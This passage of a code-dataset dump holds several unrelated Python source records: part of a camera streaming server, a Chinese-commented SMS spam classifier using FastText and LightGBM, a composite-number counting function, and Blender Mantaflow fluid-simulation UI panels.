camserv)\n\n return response\n\n def register(self, func):\n if func.id in self.funcs:\n raise ValueError(\"Cannot have duplicate name\")\n\n self.funcs[func.id] = Route(\n self.ROUTE_URL.format(func=func.id), self.endpoint(func)\n )\n self.cams[func.id] = self.CAMERA_URL_WEB.format(url=self.url, func=func.id)\n self._update()\n\n # https://github.com/wpilibsuite/allwpilib/blob/ec9738245d86ec5a535a7d9eb22eadc78dee88b4/wpilibj/src/main/java/edu/wpi/first/wpilibj/CameraServer.java#L313\n if NT_AVAIL:\n ntdict = self.netdict.get_subtable(self.CAMERA_NAME.format(func=func.id))\n ntdict[\"streams\"] = [self.CAMERA_URL_NT.format(url=self.url, func=func.id)]\n\n def unregister(self, func):\n try:\n del self.funcs[func.id]\n del self.cams[func.id]\n except KeyError:\n pass\n\n if NT_AVAIL:\n self.netdict.delete_table(self.CAMERA_NAME.format(func=func.id))\n\n self._update()\n","repo_name":"opensight-cv/opensight","sub_path":"opsi/modules/videoio/camhook.py","file_name":"camhook.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"16"} +{"seq_id":"37698281578","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nspam_df = pd.read_csv('./data/spam.csv', header=0, encoding=\"ISO-8859-1\")\n\n# 数据展示\n_, ax = plt.subplots(1,2,figsize=(10,5))\nspam_df['label'].value_counts().plot(ax=ax[0], kind=\"bar\", rot=90, title='label');\nspam_df['label'].value_counts().plot(ax=ax[1], kind=\"pie\", rot=90, title='label', ylabel='');\nprint(\"Dataset size: \", spam_df.shape)\n\nspam_df.head(5)\n\n\n# In[1]:\n\n\n# 导入相关的库\nimport nltk\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.data import load\nfrom nltk.stem import SnowballStemmer\nfrom string import punctuation\n\nimport re # 正则匹配\nstop_words = set(stopwords.words('english'))\nnon_words = list(punctuation)\n\n\n# 词形、词干还原\n# from nltk.stem import WordNetLemmatizer\n# wnl = WordNetLemmatizer()\nstemmer = SnowballStemmer('english')\ndef stem_tokens(tokens, stemmer):\n stems = []\n for token in tokens:\n stems.append(stemmer.stem(token))\n return stems\n\n\n### 清除非英文词汇并替换数值x\ndef clean_non_english_xdig(txt,isstem=True, gettok=True):\n txt = re.sub('[0-9]', 'x', txt) # 去数字替换为x\n txt = txt.lower() # 统一小写\n txt = re.sub('[^a-zA-Z]', ' ', txt) #去除非英文字符并替换为空格\n word_tokens = word_tokenize(txt) # 分词\n if not isstem: #是否做词干还原\n filtered_word = [w for w in word_tokens if not w in stop_words] # 删除停用词\n else:\n filtered_word = [stemmer.stem(w) for w in word_tokens if not w in stop_words] # 删除停用词及词干还原\n if gettok: #返回为字符串或分词列表\n return filtered_word\n else:\n return \" \".join(filtered_word)\n\n\n# In[20]:\n\n\n# 数据清洗\nspam_df['token'] = spam_df.message.apply(lambda x:clean_non_english_xdig(x))\n\n# 标签整数编码\nspam_df['label'] = (spam_df.label=='spam').astype(int)\n\nspam_df.head(3)\n\n\n# In[5]:\n\n\n# 训练词向量 Fasttext embed模型\nfrom gensim.models import FastText,word2vec\n\n\nfmodel = FastText(spam_df.token, size=100,sg=1, window=3, min_count=1, iter=10, min_n=3, max_n=6,word_ngrams=1,workers=12) \nprint(\"输出hello的词向量\",fmodel.wv['hello']) # 词向量\n# fmodel.save('./data/fasttext100dim')\n\n\n# In[12]:\n\n\nfmodel = FastText.load('./data/fasttext100dim')\n\n\n\n#对每个句子的所有词向量取均值,来生成一个句子的vector\ndef build_sentence_vector(sentence,w2v_model,size=100):\n sen_vec=np.zeros((size,))\n count=0\n for word in sentence:\n try:\n sen_vec+=w2v_model[word]#.reshape((1,size))\n count+=1\n except 
KeyError:\n continue\n if count!=0:\n sen_vec/=count\n return sen_vec\n\n# 句向量\nsents_vec = []\nfor sent in spam_df['token']:\n sents_vec.append(build_sentence_vector(sent,fmodel,size=100))\n \nprint(len(sents_vec))\n\n\n# In[38]:\n\n\n### 训练文本分类模型\nfrom sklearn.model_selection import train_test_split\nfrom lightgbm import LGBMClassifier\nfrom sklearn.linear_model import LogisticRegression\n\ntrain_x, test_x, train_y, test_y = train_test_split(sents_vec, spam_df.label,test_size=0.2,shuffle=True,random_state=42)\nresult = []\nclf = LGBMClassifier(class_weight='balanced',n_estimators=300, num_leaves=64, reg_alpha= 1,reg_lambda= 1,random_state=42)\n#clf = LogisticRegression(class_weight='balanced',random_state=42)\n\n\nclf.fit(train_x,train_y)\n\nimport pickle\n# 保存模型\n# pickle.dump(clf, open('./saved_models/spam_clf.pkl', 'wb'))\n\n# 加载模型\nmodel = pickle.load(open('./saved_models/spam_clf.pkl', 'rb'))\n\n\n# In[40]:\n\n\nfrom sklearn.metrics import auc,roc_curve,f1_score,precision_score,recall_score\ndef model_metrics(model, x, y,tp='auc'):\n \"\"\" 评估 \"\"\"\n yhat = model.predict(x)\n yprob = model.predict_proba(x)[:,1]\n fpr,tpr,_ = roc_curve(y, yprob,pos_label=1)\n metrics = {'AUC':auc(fpr, tpr),'KS':max(tpr-fpr),\n 'f1':f1_score(y,yhat),'P':precision_score(y,yhat),'R':recall_score(y,yhat)}\n \n roc_auc = auc(fpr, tpr)\n\n plt.plot(fpr, tpr, 'k--', label='ROC (area = {0:.2f})'.format(roc_auc), lw=2)\n\n plt.xlim([-0.05, 1.05]) # 设置x、y轴的上下限,以免和边缘重合,更好的观察图像的整体\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate') # 可以使用中文,但需要导入一些库即字体\n plt.title('ROC Curve')\n plt.legend(loc=\"lower right\")\n\n\n return metrics\n\nprint('train ',model_metrics(clf, train_x, train_y,tp='ks'))\nprint('test ',model_metrics(clf, test_x,test_y,tp='ks'))\n\n\n\n\n\n","repo_name":"aialgorithm/Blog","sub_path":"projects/一文概览NLP算法(Python)/sms_clf_models.py","file_name":"sms_clf_models.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":588,"dataset":"github-code","pt":"16"} +{"seq_id":"19154441001","text":"def solution(n):\r\n answer = 0\r\n\r\n for i in range(4, n+1, 1):\r\n n_list = []\r\n for j in range(1, i+1, 1):\r\n if (i % j == 0):\r\n n_list.append(j)\r\n if (len(n_list) >= 3):\r\n answer += 1 \r\n return answer","repo_name":"minu0508/Algorithm","sub_path":"Python/Programmers/Level_0/합성수 찾기.py","file_name":"합성수 찾기.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13066080706","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# <pep8 compliant>\nimport bpy\nfrom bpy.types import Panel, Menu\n\nfrom .properties_physics_common import (\n point_cache_ui,\n effector_weights_ui,\n)\n\nclass MANTA_MT_presets(Menu):\n bl_label = \"Fluid Presets\"\n preset_subdir = \"mantaflow\"\n preset_operator = \"script.execute_preset\"\n draw = Menu.draw_preset\n\nclass PhysicButtonsPanel:\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"physics\"\n\n @classmethod\n def poll(cls, context):\n ob = context.object\n rd = context.scene.render\n return (ob and ob.type == 'MESH') and (rd.engine in cls.COMPAT_ENGINES) and (context.smoke)\n\n\nclass PHYSICS_PT_manta(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Simulation\"\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n def draw(self, context):\n layout = self.layout\n\n if not bpy.app.build_options.manta:\n layout.label(\"Built without Fluid Mantaflow modifier\")\n return\n\n md = context.smoke\n ob = context.object\n scene = context.scene\n\n layout.row().prop(md, \"smoke_type\", expand=True)\n\n if md.smoke_type == 'DOMAIN':\n domain = md.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_any = domain.cache_baked_data or domain.cache_baked_mesh or domain.cache_baked_particles or domain.cache_baked_noise or domain.cache_baked_guiding\n baked_data = domain.cache_baked_data\n\n row = layout.row()\n row.enabled = not baking_any and not baked_data\n row.prop(domain, \"smoke_domain_type\", expand=False)\n\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n split.label(text=\"Border collisions:\")\n\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n\n col = split.column()\n col.prop(domain, \"use_collision_border_front\", text=\"Front\")\n col.prop(domain, \"use_collision_border_back\", text=\"Back\")\n\n col = split.column()\n col.prop(domain, \"use_collision_border_right\", text=\"Right\")\n col.prop(domain, \"use_collision_border_left\", text=\"Left\")\n\n col = split.column()\n col.prop(domain, \"use_collision_border_top\", text=\"Top\")\n col.prop(domain, \"use_collision_border_bottom\", text=\"Bottom\")\n\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n\n col = split.column(align=True)\n col1 = col.column(align=True)\n col2 = col.column(align=True)\n col1.label(text=\"Domain:\")\n col2.enabled = not baked_any\n col2.prop(domain, \"resolution_max\", text=\"Resolution\")\n col.prop(domain, \"use_adaptive_stepping\", text=\"Adaptive stepping\")\n col.prop(domain, \"time_scale\", text=\"Time\")\n col.prop(domain, \"cfl_condition\", text=\"CFL\")\n\n col = split.column()\n if scene.use_gravity:\n col.label(text=\"Use Scene Gravity\", icon='SCENE_DATA')\n sub = col.column()\n sub.enabled = False\n sub.prop(domain, \"gravity\", text=\"\")\n else:\n col.label(text=\"Gravity:\")\n 
col.prop(domain, \"gravity\", text=\"\")\n # TODO (sebas): Clipping var useful for manta openvdb caching?\n # col.prop(domain, \"clipping\")\n\n if domain.smoke_domain_type in {'GAS'}:\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n\n col = split.column(align=True)\n col.label(text=\"Smoke:\")\n col.prop(domain, \"alpha\")\n col.prop(domain, \"beta\", text=\"Temp. Diff.\")\n col.prop(domain, \"vorticity\")\n col.prop(domain, \"use_dissolve_smoke\", text=\"Dissolve\")\n sub = col.column()\n sub.active = domain.use_dissolve_smoke\n sub.prop(domain, \"dissolve_speed\", text=\"Time\")\n sub.prop(domain, \"use_dissolve_smoke_log\", text=\"Slow\")\n\n col = split.column(align=True)\n col.label(text=\"Fire:\")\n col.prop(domain, \"burning_rate\")\n col.prop(domain, \"flame_smoke\")\n col.prop(domain, \"flame_vorticity\")\n col.prop(domain, \"flame_ignition\")\n col.prop(domain, \"flame_max_temp\")\n col.prop(domain, \"flame_smoke_color\")\n\n if domain.smoke_domain_type in {'LIQUID'}:\n split = layout.split()\n\n col = split.column(align=True)\n col1 = col.column()\n col1.enabled = not baking_any and not baked_data\n col1.label(text=\"Liquid:\")\n col1.prop(domain, \"particle_maximum\")\n col1.prop(domain, \"particle_minimum\")\n col2 = col.column()\n col2.enabled = not baking_any\n col2.prop(domain, \"use_flip_particles\", text=\"Show FLIP\")\n\n col = split.column(align=True)\n col.enabled = not baking_any and not baked_data\n col.label()\n col.prop(domain, \"particle_number\")\n col.prop(domain, \"particle_band_width\")\n col.prop(domain, \"particle_randomness\")\n\n split = layout.split()\n bake_incomplete = (domain.cache_frame_pause_data < domain.cache_frame_end)\n if domain.cache_baked_data and not domain.cache_baking_data and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_data\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_data\", text=\"Free\")\n elif not domain.cache_baked_data and domain.cache_baking_data:\n split.operator(\"manta.pause_bake\", text=\"Pause Data\")\n elif not domain.cache_baked_data and not domain.cache_baking_data:\n split.operator(\"manta.bake_data\", text=\"Bake Data\")\n else:\n split.operator(\"manta.free_data\", text=\"Free Data\")\n\n elif md.smoke_type == 'FLOW':\n flow = md.flow_settings\n\n layout.prop(flow, \"smoke_flow_type\", expand=False)\n\n split = layout.split()\n col = split.column()\n\n col.label(text=\"Sampling:\")\n col.prop(flow, \"subframes\")\n\n col = split.column()\n\n col.label(text=\"Flow behavior:\")\n col.prop(flow, \"smoke_flow_behavior\", expand=False, text=\"\")\n\n if not flow.smoke_flow_behavior == 'OUTFLOW':\n\n split = layout.split()\n col = split.column()\n\n if flow.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}:\n col.label(text=\"Initial Values:\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH'}:\n col.prop(flow, \"density\")\n col.prop(flow, \"temperature\")\n if flow.smoke_flow_type in {'FIRE', 'BOTH'}:\n col.prop(flow, \"fuel_amount\")\n\n col = split.column()\n\n if flow.smoke_flow_behavior in {'INFLOW'}:\n col.prop(flow, \"use_inflow\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}:\n col.prop(flow, \"use_absolute\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH'}:\n col.prop(flow, \"smoke_color\")\n\n elif md.smoke_type == 'EFFECTOR':\n effec = md.effec_settings\n\n layout.prop(effec, \"effec_type\")\n\n split = layout.split()\n col = split.column()\n\n col.label(text=\"Surface thickness:\")\n if effec.effec_type == \"GUIDE\":\n 
col.label(text=\"Velocity factor:\")\n col.label(text=\"Guiding mode:\")\n col = split.column()\n\n col.prop(effec, \"surface_distance\")\n if effec.effec_type == \"GUIDE\":\n col.prop(effec, \"velocity_factor\")\n col.prop(effec, \"guiding_mode\", text=\"\")\n\nclass PHYSICS_PT_manta_flow_source(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Source\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n return md and (md.smoke_type == 'FLOW')\n\n def draw(self, context):\n layout = self.layout\n ob = context.object\n flow = context.smoke.flow_settings\n\n split = layout.split()\n\n col = split.column()\n col.label(text=\"Flow source:\")\n col.prop(flow, \"smoke_flow_source\", expand=False, text=\"\")\n if flow.smoke_flow_source == 'MESH':\n col.prop(flow, \"surface_distance\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}:\n col.prop(flow, \"volume_density\")\n if flow.smoke_flow_source == 'PARTICLES':\n col.prop_search(flow, \"particle_system\", ob, \"particle_systems\", text=\"\")\n col.prop(flow, \"use_particle_size\", text=\"Set Size\")\n sub = col.column()\n sub.active = flow.use_particle_size\n sub.prop(flow, \"particle_size\")\n\n col = split.column()\n col.label(text=\"Flow velocity:\")\n col.prop(flow, \"use_initial_velocity\")\n\n sub = col.column()\n sub.active = flow.use_initial_velocity\n sub.prop(flow, \"velocity_factor\")\n if flow.smoke_flow_source == 'MESH':\n sub.prop(flow, \"velocity_normal\")\n #sub.prop(flow, \"velocity_random\")\n\nclass PHYSICS_PT_manta_flow_advanced(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Flow Advanced\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n return md and (md.smoke_type == 'FLOW') and (md.flow_settings.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}) and (md.flow_settings.smoke_flow_source in {'MESH'})\n\n def draw(self, context):\n layout = self.layout\n ob = context.object\n flow = context.smoke.flow_settings\n\n split = layout.split()\n\n col = split.column()\n col.prop(flow, \"use_texture\")\n sub = col.column()\n sub.active = flow.use_texture\n sub.prop(flow, \"noise_texture\", text=\"\")\n sub.label(text=\"Mapping:\")\n sub.prop(flow, \"texture_map_type\", expand=False, text=\"\")\n if flow.texture_map_type == 'UV':\n sub.prop_search(flow, \"uv_layer\", ob.data, \"uv_textures\", text=\"\")\n if flow.texture_map_type == 'AUTO':\n sub.prop(flow, \"texture_size\")\n sub.prop(flow, \"texture_offset\")\n\n col = split.column()\n col.label(text=\"Vertex Group:\")\n col.prop_search(flow, \"density_vertex_group\", ob, \"vertex_groups\", text=\"\")\n\nclass PHYSICS_PT_manta_adaptive_domain(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Adaptive Domain\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n # Adaptive domain only for smoke right now\n # TODO (sebbas): Disable for now - not working with new manta cache right now\n return False #md and (md.smoke_type == 'DOMAIN') and (md.domain_settings.smoke_domain_type in {'GAS'})\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n self.layout.prop(md, \"use_adaptive_domain\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n\n domain = context.smoke.domain_settings\n layout.active = domain.use_adaptive_domain\n\n split = layout.split()\n baking_any = domain.cache_baking_data or 
domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n split.enabled = not baking_any\n\n col = split.column(align=True)\n col.label(text=\"Resolution:\")\n col.prop(domain, \"additional_res\")\n col.prop(domain, \"adapt_margin\")\n\n col = split.column(align=True)\n col.label(text=\"Advanced:\")\n col.prop(domain, \"adapt_threshold\")\n\n\nclass PHYSICS_PT_manta_quality(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Quality\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n # Disable for now. Not sure if and how render/ viewport display options needed in 2.8\n return False #md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n split = layout.split()\n\n col = split.column()\n col.label(text=\"Render Display:\")\n col.prop(domain, \"render_display_mode\", text=\"\")\n\n col = split.column()\n col.label(text=\"Viewport Display:\")\n col.prop(domain, \"viewport_display_mode\", text=\"\")\n\nclass PHYSICS_PT_manta_noise(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Noise\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (md.domain_settings.smoke_domain_type in {'GAS'})\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n domain = context.smoke.domain_settings\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n self.layout.enabled = not baking_any\n self.layout.prop(md, \"use_noise\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = domain.use_noise and not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_noise = domain.cache_baked_noise\n\n split = layout.split()\n split.enabled = not baking_any and not baked_noise\n\n col = split.column(align=True)\n col.prop(domain, \"noise_scale\", text=\"Upres\")\n # TODO (sebbas): Mantaflow only supports wavelet noise. 
Maybe get rid of noise type field.\n col.label(text=\"Noise Method:\")\n col.prop(domain, \"noise_type\", text=\"\")\n\n col = split.column(align=True)\n col.prop(domain, \"strength\")\n col.prop(domain, \"noise_pos_scale\")\n col.prop(domain, \"noise_time_anim\")\n\n split = layout.split()\n split.enabled = domain.cache_baked_data\n bake_incomplete = (domain.cache_frame_pause_noise < domain.cache_frame_end)\n if domain.cache_baked_noise and not domain.cache_baking_noise and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_noise\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_noise\", text=\"Free\")\n elif not domain.cache_baked_noise and domain.cache_baking_noise:\n split.operator(\"manta.pause_bake\", text=\"Pause Noise\")\n elif not domain.cache_baked_noise and not domain.cache_baking_noise:\n split.operator(\"manta.bake_noise\", text=\"Bake Noise\")\n else:\n split.operator(\"manta.free_noise\", text=\"Free Noise\")\n\nclass PHYSICS_PT_manta_mesh(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Mesh\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (md.domain_settings.smoke_domain_type in {'LIQUID'})\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n domain = context.smoke.domain_settings\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n self.layout.enabled = not baking_any\n self.layout.prop(md, \"use_mesh\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = domain.use_mesh and not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_mesh = domain.cache_baked_mesh\n\n split = layout.split()\n split.enabled = not baking_any and not baked_mesh\n\n col = split.column(align=True)\n col.prop(domain, \"mesh_scale\", text=\"Upres\")\n col.prop(domain, \"particle_radius\")\n\n col = split.column(align=True)\n col.prop(domain, \"use_speed_vectors\", text=\"Speed vectors\")\n col.prop(domain, \"mesh_generator\", text=\"\")\n\n if domain.mesh_generator in {'IMPROVED'}:\n split = layout.split()\n split.enabled = not baking_any and not baked_mesh\n\n col = split.column(align=True)\n col.label(text=\"Smoothing:\")\n col.prop(domain, \"mesh_smoothen_pos\")\n col.prop(domain, \"mesh_smoothen_neg\")\n\n col = split.column(align=True)\n col.label(text=\"Concavity:\")\n col.prop(domain, \"mesh_concave_upper\")\n col.prop(domain, \"mesh_concave_lower\")\n\n # TODO (sebbas): for now just interpolate any upres grids, ie not sampling highres grids \n #col = split.column()\n #col.label(text=\"Flow Sampling:\")\n #col.prop(domain, \"highres_sampling\", text=\"\")\n\n split = layout.split()\n split.enabled = domain.cache_baked_data\n bake_incomplete = (domain.cache_frame_pause_mesh < domain.cache_frame_end)\n if domain.cache_baked_mesh and not domain.cache_baking_mesh and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_mesh\", 
text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_mesh\", text=\"Free\")\n elif not domain.cache_baked_mesh and domain.cache_baking_mesh:\n split.operator(\"manta.pause_bake\", text=\"Pause Mesh\")\n elif not domain.cache_baked_mesh and not domain.cache_baking_mesh:\n split.operator(\"manta.bake_mesh\", text=\"Bake Mesh\")\n else:\n split.operator(\"manta.free_mesh\", text=\"Free Mesh\")\n\nclass PHYSICS_PT_manta_particles(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Particles\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n # TODO (sebbas): Fluid particles only enabled for liquids for now. Future update might include particles for gas domain, e.g. fire sparks.\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES) and (md.domain_settings.smoke_domain_type in {'LIQUID'}) \n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_particles = domain.cache_baked_particles\n\n split = layout.split()\n split.prop(domain, \"particle_scale\", text=\"Upres\")\n split.enabled = not baking_any and not baked_particles\n\n split = layout.split()\n split.enabled = not baking_any and not baked_particles\n\n col = split.column()\n col.prop(domain, \"use_spray_particles\", text=\"Drop\")\n sub = col.column(align=True)\n sub.active = domain.use_spray_particles\n sub.prop(domain, \"particle_droplet_threshold\", text=\"Threshold\")\n sub.prop(domain, \"particle_droplet_amount\", text=\"Generate\")\n sub.prop(domain, \"particle_droplet_life\", text=\"Life\")\n sub.prop(domain, \"particle_droplet_max\", text=\"Maximum\")\n sub2 = col.column()\n sub2.active = domain.use_spray_particles\n sub2.prop(domain, \"use_bubble_particles\", text=\"Bubble\")\n sub3 = col.column(align=True)\n sub3.active = domain.use_spray_particles and domain.use_bubble_particles\n sub3.prop(domain, \"particle_bubble_rise\", text=\"Rise\")\n sub3.prop(domain, \"particle_bubble_life\", text=\"Life\")\n sub3.prop(domain, \"particle_bubble_max\", text=\"Maximum\")\n\n col = split.column()\n col.prop(domain, \"use_foam_particles\", text=\"Float\")\n sub = col.column(align=True)\n sub.active = domain.use_foam_particles\n sub.prop(domain, \"particle_floater_amount\", text=\"Generate\")\n sub.prop(domain, \"particle_floater_life\", text=\"Life\")\n sub.prop(domain, \"particle_floater_max\", text=\"Maximum\")\n col.prop(domain, \"use_tracer_particles\", text=\"Tracer\")\n sub2 = col.column(align=True)\n sub2.active = domain.use_tracer_particles\n sub2.prop(domain, \"particle_tracer_amount\", text=\"Amount\")\n sub2.prop(domain, \"particle_tracer_life\", text=\"Life\")\n sub2.prop(domain, \"particle_tracer_max\", text=\"Maximum\")\n\n split = layout.split()\n split.enabled = domain.cache_baked_data and (domain.use_spray_particles or domain.use_bubble_particles or domain.use_foam_particles or domain.use_tracer_particles)\n bake_incomplete = (domain.cache_frame_pause_particles < domain.cache_frame_end)\n if 
domain.cache_baked_particles and not domain.cache_baking_particles and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_particles\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_particles\", text=\"Free\")\n elif not domain.cache_baked_particles and domain.cache_baking_particles:\n split.operator(\"manta.pause_bake\", text=\"Pause Particles\")\n elif not domain.cache_baked_particles and not domain.cache_baking_particles:\n split.operator(\"manta.bake_particles\", text=\"Bake Particles\")\n else:\n split.operator(\"manta.free_particles\", text=\"Free Particles\")\n\nclass PHYSICS_PT_manta_diffusion(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Diffusion\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n # Fluid diffusion only enabled for liquids (surface tension and viscosity not relevant for smoke)\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES) and (md.domain_settings.smoke_domain_type in {'LIQUID'}) \n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n split = layout.split()\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n split.enabled = not baking_any\n\n col = split.column()\n col.label(text=\"Viscosity Presets:\")\n sub = col.row(align=True)\n sub.menu(\"MANTA_MT_presets\", text=bpy.types.MANTA_MT_presets.bl_label)\n sub.operator(\"manta.preset_add\", text=\"\", icon='ZOOMIN')\n sub.operator(\"manta.preset_add\", text=\"\", icon='ZOOMOUT').remove_active = True\n\n sub = col.column(align=True)\n sub.prop(domain, \"viscosity_base\", text=\"Base\")\n sub.prop(domain, \"viscosity_exponent\", text=\"Exponent\", slider=True)\n\n col = split.column()\n col.label(text=\"Real World Size:\")\n col.prop(domain, \"domain_size\", text=\"Meters\")\n col.label(text=\"Surface tension:\")\n col.prop(domain, \"surface_tension\", text=\"Tension\")\n\nclass PHYSICS_PT_manta_guiding(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Guiding\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n domain = context.smoke.domain_settings\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n self.layout.enabled = not baking_any\n self.layout.prop(md, \"use_guiding\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n layout.active = domain.use_guiding\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or 